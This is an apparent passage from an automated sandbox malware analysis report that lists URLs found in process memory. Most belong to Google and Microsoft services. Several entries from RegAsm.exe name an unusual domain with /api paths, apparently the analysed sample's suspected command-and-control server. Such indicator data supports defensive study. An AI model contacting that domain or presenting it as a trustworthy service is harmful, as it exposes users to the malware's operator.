      Source: chrome.exe, 00000008.00000002.2129755685.000009B4000DC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://edgedl.me.gvt1.com/edgedl/release2/chrome_component/clxypm5qigkf6w4j3sn2c4jnx4_474/lmelglejh
      Source: chrome.exe, 00000008.00000002.2134021100.000009B400A54000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://edgedl.me.gvt1.com/edgedl/release2/chrome_component/cxxqn654fg7hzrcrrnqcniqqye_2024.10.11.1/
      Source: chrome.exe, 00000008.00000002.2134021100.000009B400A54000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://edgedl.me.gvt1.com/edgedl/release2/chrome_component/e6xlmsu5i2bokri3w4cyuhv4nq_2024.8.10.0/g
      Source: chrome.exe, 00000008.00000002.2134021100.000009B400A54000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2129755685.000009B4000DC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://edgedl.me.gvt1.com/edgedl/release2/chrome_component/imoffpf67hel7kbknqflao2oo4_1.0.2738.0/ne
      Source: chrome.exe, 00000008.00000003.1272121186.000009B401340000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://encrypted-tbn0.gstatic.com/faviconV2?url=https://rest.co.il&client=PASSWORD_MANAGER&size=16&
      Source: chrome.exe, 00000008.00000003.1272121186.000009B401340000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://encrypted-tbn2.gstatic.com/faviconV2?url=https://login.live.com&client=PASSWORD_MANAGER&size
      Source: chrome.exe, 00000008.00000002.2135517261.000009B400DC0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2134021100.000009B400A54000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://gemini.google.com/app?q=
      Source: chrome.exe, 00000008.00000002.2135517261.000009B400DC0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://gemini.google.com/app?q=searchTerms
      Source: chrome.exe, 00000008.00000003.941328351.000009B000514000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2129067438.000009B000698000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/
      Source: chrome.exe, 00000008.00000003.995658757.000009B0006CC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.990996317.000009B401A6C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/2J
      Source: chrome.exe, 00000008.00000003.941328351.000009B000514000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/https://google-ohttp-relay-join.fastly-edge.com/
      Source: chrome.exe, 00000008.00000002.2129067438.000009B000698000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/https://google-ohttp-relay-query.fastly-edge.com/htt
      Source: chrome.exe, 00000008.00000003.941328351.000009B000514000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2129067438.000009B000698000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/
      Source: chrome.exe, 00000008.00000003.995658757.000009B0006CC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.990996317.000009B401A6C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/2P
      Source: chrome.exe, 00000008.00000003.941328351.000009B000514000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/https://chromekanonymityquery-pa.googleapis.com/htt
      Source: chrome.exe, 00000008.00000002.2130527345.000009B400254000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2129316003.000009B400004000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2137289557.000009B40107C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google.com/
      Source: chrome.exe, 00000008.00000003.1046908626.000009B401A04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1046419239.000009B40155C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://googleads.g.doubleclick.net
      Source: chrome.exe, 00000008.00000002.2137914589.000009B40115C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1046908626.000009B401A04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2129802105.000009B4000F0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1046419239.000009B40155C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://googleads.g.doubleclick.net/
      Source: chrome.exe, 00000008.00000002.2137914589.000009B40115C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1046908626.000009B401A04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1046419239.000009B40155C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-2584082051607049&output=html&adk=181227
      Source: chrome.exe, 00000008.00000002.2137914589.000009B40115C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1046908626.000009B401A04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1046419239.000009B40155C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-2584082051607049&output=html&h=280&slot
      Source: chrome.exe, 00000008.00000003.1046908626.000009B401A04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1046419239.000009B40155C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-2584082051607049&output=html&h=90&slotn
      Source: chrome.exe, 00000008.00000002.2137914589.000009B40115C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1046908626.000009B401A04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1046419239.000009B40155C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://googleads.g.doubleclick.net/pagead/drt/s?v=r20120211
      Source: chrome.exe, 00000008.00000002.2137914589.000009B40115C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1046908626.000009B401A04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1046419239.000009B40155C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://googleads.g.doubleclick.net/pagead/drt/si
      Source: chrome.exe, 00000008.00000002.2137914589.000009B40115C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1046908626.000009B401A04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1046419239.000009B40155C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://googleads.g.doubleclick.net/pagead/html/r20210916/r20110914/zrt_lookup.html?fsb=1#RS-0-&adk=
      Source: chrome.exe, 00000008.00000002.2137914589.000009B40115C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1046908626.000009B401A04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1046419239.000009B40155C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://googleads.g.doubleclick.net/pagead/html/r20210916/r20190131/zrt_lookup.html
      Source: chrome.exe, 00000008.00000002.2137914589.000009B40115C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1046908626.000009B401A04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1046419239.000009B40155C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://googleads.g.doubleclick.net/xbbe/pixel?d=CICfxAEQ7KXQkAIY7dHaqQEwAQ&v=APEucNV8Higyb1mdtfCkDQ
      Source: chrome.exe, 00000008.00000002.2133827650.000009B4009F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://googleusercontent.com/
      Source: chrome.exe, 00000008.00000003.1000143016.000009B401C64000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.942427852.000009B0005AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.942528995.000009B0005B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.942742503.000009B0005CC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://goto.google.com/sme-bugs
      Source: chrome.exe, 00000008.00000003.995658757.000009B0006CC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.990996317.000009B401A6C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://goto.google.com/sme-bugs27
      Source: chrome.exe, 00000008.00000003.990996317.000009B401A6C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://goto.google.com/sme-bugs2e
      Source: chrome.exe, 00000008.00000003.985462586.000009B401928000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.985730131.000009B4019E0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.989999147.000009B40148C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.985646219.000009B401928000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.985825773.000009B4019F0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.985862674.000009B401588000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1162649249.000009B401838000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.985785507.000009B4019E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.989939605.000009B401944000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2141351455.000009B401838000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://id.google.com/verify/AHEVGRyC3pWiEkDFk51d8RP7UIjkTyE_nwnEdiGWeZcAZ3w9aCxwqVafJluPRzvqwYSI2Kr
      Source: chrome.exe, 00000008.00000002.2137169781.000009B40103C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.966655744.000009B400A84000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/220069903
      Source: chrome.exe, 00000008.00000002.2137169781.000009B40103C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.966655744.000009B400A84000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/292285899
      Source: chrome.exe, 00000008.00000002.2137169781.000009B40103C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.966655744.000009B400A84000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/349489248
      Source: chrome.exe, 00000008.00000002.2136867640.000009B400FAC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2137474127.000009B4010C8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://javadl.oracle.com/webapps/download/AutoDL?BundleId=245029_d3c52aa6bfa54d3ca74e617f18309292
      Source: chrome.exe, 00000008.00000002.2135416481.000009B400D84000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2140833525.000009B4016F4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1546757959.000009B400D83000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2134871796.000009B400C48000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://keep.google.com/u/0/?usp=chrome_actions#NEWNOTE
      Source: RegAsm.exe, 00000007.00000002.1062369074.0000000000B7D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://knifedxejsu.cyou/
      Source: RegAsm.exe, 00000007.00000002.1062369074.0000000000B7D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://knifedxejsu.cyou/6z
      Source: RegAsm.exe, 00000007.00000002.1062369074.0000000000B7D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://knifedxejsu.cyou/Zy
      Source: RegAsm.exe, 00000007.00000002.1061887586.0000000000B01000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.1061887586.0000000000B13000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.1062635600.0000000000B99000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.1061747097.0000000000ACA000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.1062957881.0000000000BBB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://knifedxejsu.cyou/api
      Source: RegAsm.exe, 00000007.00000002.1061887586.0000000000B13000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://knifedxejsu.cyou/apiw
      Source: RegAsm.exe, 00000007.00000002.1062369074.0000000000B7D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://knifedxejsu.cyou/s
      Source: chrome.exe, 00000008.00000003.985462586.000009B401928000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.985730131.000009B4019E0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.989999147.000009B40148C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.985646219.000009B401928000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.985825773.000009B4019F0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.985862674.000009B401588000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1162649249.000009B401838000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.985785507.000009B4019E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.989939605.000009B401944000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2141351455.000009B401838000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://labs.google.com/search?source=ntp
      Source: chrome.exe, 00000008.00000003.973480513.000009B400604000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.973089654.000009B401804000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.972963112.000009B400544000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lens.google.com/gen204
      Source: chrome.exe, 00000008.00000003.973480513.000009B400604000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.973089654.000009B401804000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.972963112.000009B400544000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lens.google.com/upload
      Source: chrome.exe, 00000008.00000003.973480513.000009B400604000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.973089654.000009B401804000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.972963112.000009B400544000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lens.google.com/uploadbyurl
      Source: chrome.exe, 00000008.00000003.973480513.000009B400604000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.973089654.000009B401804000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.972963112.000009B400544000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lens.google.com/v3/upload
      Source: chrome.exe, 00000008.00000002.2129067438.000009B000698000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.990996317.000009B401AE4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lensfrontend-pa.googleapis.com/v1/crupload
      Source: chrome.exe, 00000008.00000003.995658757.000009B0006CC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.990996317.000009B401A6C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lensfrontend-pa.googleapis.com/v1/crupload2
      Source: chrome.exe, 00000008.00000003.1272121186.000009B401340000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2141351455.000009B401838000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://live.com
      Source: chrome.exe, 00000008.00000002.2130491850.000009B400248000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1272121186.000009B401340000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2133612138.000009B40099C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2131403853.000009B400474000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2136003376.000009B400E54000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2129942611.000009B40012C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2134021100.000009B400A54000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2130814925.000009B400320000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2137474127.000009B4010C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2138756692.000009B4012AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1162649249.000009B401838000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1875533897.000009B4012AA000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2141351455.000009B401838000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2139760290.000009B40141C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://login.live.com
      Source: chrome.exe, 00000008.00000002.2131403853.000009B400474000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2129942611.000009B40012C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2137958094.000009B40116C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2130814925.000009B400320000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2137669235.000009B40110C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/
      Source: chrome.exe, 00000008.00000002.2136867640.000009B400FAC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2137474127.000009B4010C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2138916816.000009B4012F0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/0
      Source: chrome.exe, 00000008.00000002.2136867640.000009B400FAC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2137474127.000009B4010C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2138916816.000009B4012F0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/0BJP
      Source: chrome.exe, 00000008.00000002.2139072537.000009B401320000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2137169781.000009B40103C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2136003376.000009B400E54000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2130814925.000009B400320000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2137474127.000009B4010C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2139191010.000009B401350000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=77f68844-337b-4044-a0d4-153795cf9153&scope=op
      Source: chrome.exe, 00000008.00000002.2139072537.000009B401320000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2134091279.000009B400AA0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2137474127.000009B4010C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2139191010.000009B401350000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2137770733.000009B401130000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/post.srf?client_id=77f68844-337b-4044-a0d4-153795cf9153&scope=openid
      Source: chrome.exe, 00000008.00000003.1272121186.000009B401340000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2141351455.000009B401838000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com
      Source: chrome.exe, 00000008.00000002.2139072537.000009B401320000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2139191010.000009B401350000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/consumers/oauth2/v2.0/authorize?client_id=77f68844-337b-4044-a0d4-
      Source: chrome.exe, 00000008.00000002.2139072537.000009B401320000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2139191010.000009B401350000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://login.windows.net/consumers/oauth2/v2.0/authorize?client_id=77f68844-337b-4044-a0d4-153795cf
      Source: chrome.exe, 00000008.00000002.2130656769.000009B40026C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://m.google.com/devicemanagement/data/api
      Source: chrome.exe, 00000008.00000002.2133393957.000009B400940000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mail.google.com/mail/:
      Source: chrome.exe, 00000008.00000003.985462586.000009B401928000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.985730131.000009B4019E0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.989999147.000009B40148C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.985646219.000009B401928000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.985825773.000009B4019F0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.985862674.000009B401588000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1162649249.000009B401838000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.985785507.000009B4019E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.989939605.000009B401944000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2141351455.000009B401838000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mail.google.com/mail/?tab=rm&ogbl
      Source: chrome.exe, 00000008.00000002.2133904022.000009B400A04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2133393957.000009B400940000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2137669235.000009B40110C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2139410870.000009B4013A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mail.google.com/mail/?usp=installed_webapp
      Source: chrome.exe, 00000008.00000002.2133393957.000009B400940000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mail.google.com/mail/J
      Source: chrome.exe, 00000008.00000002.2141553304.000009B4018B0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2133393957.000009B400940000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2137669235.000009B40110C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mail.google.com/mail/installwebapp?usp=chrome_default
      Source: chrome.exe, 00000008.00000003.1272121186.000009B401340000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2141351455.000009B401838000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://microsoftonline.com
      Source: chrome.exe, 00000008.00000002.2140605622.000009B4015A8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2134461361.000009B400B54000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2135364167.000009B400D64000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://myaccount.google.com/?utm_source=ga-chrome-actions&utm_medium=manageGA
      Source: chrome.exe, 00000008.00000002.2134021100.000009B400A54000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2132840549.000009B400848000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://myaccount.google.com/data-and-privacy?utm_source=ga-chrome-actions&utm_medium=managePrivacy
      Source: chrome.exe, 00000008.00000002.2134021100.000009B400A54000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2137474127.000009B4010C8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://myaccount.google.com/find-your-phone?utm_source=ga-chrome-actions&utm_medium=findYourPhone
      Source: chrome.exe, 00000008.00000003.1000143016.000009B401C64000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.942427852.000009B0005AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.942528995.000009B0005B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.942742503.000009B0005CC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://myaccount.google.com/shielded-email
      Source: chrome.exe, 00000008.00000003.995658757.000009B0006CC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.990996317.000009B401A6C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://myaccount.google.com/shielded-email2B
      Source: chrome.exe, 00000008.00000002.2134021100.000009B400A54000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2137474127.000009B4010C8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://myaccount.google.com/signinoptions/password?utm_source=ga-chrome-actions&utm_medium=changePW
      Source: chrome.exe, 00000008.00000003.970199396.000009B4011D4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2134978060.000009B400C8C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://myactivity.google.com/
      Source: chrome.exe, 00000008.00000002.2133778489.000009B4009E0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://myshop.amplify.com/cart
      Source: chrome.exe, 00000008.00000002.2130527345.000009B400254000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oauthaccountmanager.googleapis.com/
      Source: chrome.exe, 00000008.00000002.2130656769.000009B40026C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oauthaccountmanager.googleapis.com/v1/issuetoken
      Source: RegAsm.exe, 00000007.00000002.1061887586.0000000000B13000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.2125456034.000001EE12302000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.2125122119.000001EE12296000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ocsp.quovadisoffshore.com0
      Source: chrome.exe, 00000008.00000003.1272121186.000009B401340000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2141351455.000009B401838000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://office.com
      Source: chrome.exe, 00000008.00000003.985462586.000009B401928000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.989999147.000009B40148C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.988406192.000009B4019BC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.985646219.000009B401928000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.985862674.000009B401588000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2141656584.000009B401980000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.989939605.000009B401944000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ogads-pa.googleapis.com
      Source: chrome.exe, 00000008.00000003.990110840.000009B400380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2139905948.000009B401440000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2136206579.000009B400E94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ogs.google.com
      Source: chrome.exe, 00000008.00000003.985462586.000009B401928000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.989999147.000009B40148C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.988406192.000009B4019BC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.985646219.000009B401928000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.985862674.000009B401588000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2141656584.000009B401980000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.989939605.000009B401944000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ogs.google.com/widget/app/so?eom=1
      Source: chrome.exe, 00000008.00000003.985462586.000009B401928000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.989999147.000009B40148C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.988406192.000009B4019BC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.985646219.000009B401928000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.985862674.000009B401588000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2141656584.000009B401980000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.989939605.000009B401944000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ogs.google.com/widget/callout?eom=1
